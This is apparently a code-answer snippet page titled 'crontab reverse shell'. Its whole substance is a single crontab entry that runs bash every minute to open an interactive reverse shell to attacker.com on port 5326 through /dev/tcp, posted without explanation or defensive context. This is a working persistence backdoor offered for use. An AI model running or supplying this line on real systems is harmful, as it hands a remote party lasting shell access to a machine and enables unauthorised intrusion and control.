Answers for "crontab reverse shell"

0

crontab reverse shell

* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1'
Posted by: Guest on February-01-2022

Code answers related to "Shell/Bash"

Browse Popular Code Answers by Language